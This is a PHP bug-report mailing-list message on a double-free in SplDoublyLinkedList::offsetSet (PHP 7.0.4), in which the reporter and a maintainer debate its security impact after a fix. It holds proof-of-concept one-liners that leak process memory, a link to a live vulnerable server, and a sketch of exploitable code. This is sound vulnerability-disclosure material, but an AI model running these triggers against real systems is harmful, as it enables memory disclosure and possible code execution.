Bug #71735 [Com]: Double-free in SplDoublyLinkedList::offsetSet

From: Date: Mon, 21 Mar 2016 07:51:56 +0000
Subject: Bug #71735 [Com]: Double-free in SplDoublyLinkedList::offsetSet
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-199988@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=71735&edit=1 ID: 71735 Comment by: emmanuel dot law at gmail dot com Reported by: emmanuel dot law at gmail dot com Summary: Double-free in SplDoublyLinkedList::offsetSet Status: Closed Type: Bug Package: SPL related Operating System: * PHP Version: 7.0.4 Block user comment: N Private report: N New Comment: Also, the patch works. So either way problem is solved. Previous Comments: ------------------------------------------------------------------------ [2016-03-21 07:50:30] emmanuel dot law at gmail dot com 1) Didn't mean to re-open the bug. Was a race condition when both you and I were replying. 2)Here's my last word on why I think it is a security bug. I'll leave the final decision to you. ==Remote Scenario (nginx)== Here's a remote exploit that leaks the the memory on server: Vuln: http://52.63.107.251/71750.php?id=0&times=100 Source code: http://52.63.107.251/71750.php.src Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in /usr/share/nginx/html/71750.php:6 Stack trace: #0 /usr/share/nginx/html/71750.php(6): SplDoublyLinkedList->offsetSet('0', '`<\x96\xA6\xD5\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00...') #1 {main} thrown in /usr/share/nginx/html/71750.php on line 6 ===Local scenario=== It is possible to gain (local) code execution within harden php environment where functions such as exec() or system() are disabled. EG: Harden production environment or sites such as sandbox.onlinephpfunctions.com and 3v4l.org ------------------------------------------------------------------------ [2016-03-21 06:35:10] stas@php.net I'm sorry, I'm not sure I understand - all your examples are constructed code run on the command line, so how that comes to remote exploit? Also, you reopened the bug - did you mean you still can reproduce it? I could not reproduce it with your examples after the fix, could you please provide more information about what do you see after the fix? ------------------------------------------------------------------------ [2016-03-21 06:19:49] emmanuel dot law at gmail dot com The specially crated code i gave was to gain remote code execution. Here are several simpler examples that leak the memory. Notice how each time I change the length of str_repeat, it leaks different part of the memory: #### Example 1, str_repeat 0x5 ##### $ ~/php-7.0.4/sapi/cli/php -r '(new SplStack())->offsetSet(0,str_repeat("A",0x05));' <<< string length Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in Command line code:1 Stack trace: #0 Command line code(1): SplDoublyLinkedList->offsetSet(0, 'function') <<<<<< Leaks 'function' #1 {main} thrown in Command line code on line 1 #### Example 2, str_repeat 0x15 ##### $ ~/php-7.0.4/sapi/cli/php -r '(new SplStack())->offsetSet(0,str_repeat("A",0x15));' Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in Command line code:1 Stack trace: #0 Command line code(1): SplDoublyLinkedList->offsetSet(0, '\x01\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00...') <<<<<< Leaks random bytes in memory #1 {main} thrown in Command line code on line 1 #### Example 3, str_repeat 0x20 ##### $ ~/php-7.0.4/sapi/cli/php -r '(new SplStack())->offsetSet(0,str_repeat("A",0x20));' Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in Command line code:1 Stack trace: #0 Command line code(1): SplDoublyLinkedList->offsetSet(0, 'OutOfRangeExcep...') <<<<<< Leaks other strings in memory #1 {main} thrown in Command line code on line 1 #### Example 4 str_repeat 0x30 ##### $ ~/php-7.0.4/sapi/cli/php -r '(new SplStack())->offsetSet(0,str_repeat("A",0x30));' Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in Command line code:1 Stack trace: #0 Command line code(1): SplDoublyLinkedList->offsetSet(0, 'AAAAAAAAAAAAAAA...') <<< this is the expected output. #1 {main} thrown in Command line code on line 1 This discrepancies in the output are all manifestation of the double free vulnerability. Depending on what is passed into the vulnerable function, it results in different form of exploitation. Thus I think it's a security issue. Imagine a plausible code such as: <?php new SplStack())->offsetSet($_GET['id'],$_GET['data']); ?> ------------------------------------------------------------------------ [2016-03-21 06:11:11] stas@php.net Automatic comment on behalf of stas Revision: http://git.php.net/?p=php-src.git;a=commit;h=28a6ed9f9a36b9c517e4a8a429baf4dd382fc5d5 Log: Fix bug #71735: Double-free in SplDoublyLinkedList::offsetSet ------------------------------------------------------------------------ [2016-03-21 05:17:25] stas@php.net Doesn't look like a security issue - requires specially crafted code to reproduce the bug. ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at https://bugs.php.net/bug.php?id=71735 -- Edit this bug report at https://bugs.php.net/bug.php?id=71735&edit=1

« previous php.bugs (#199988) next »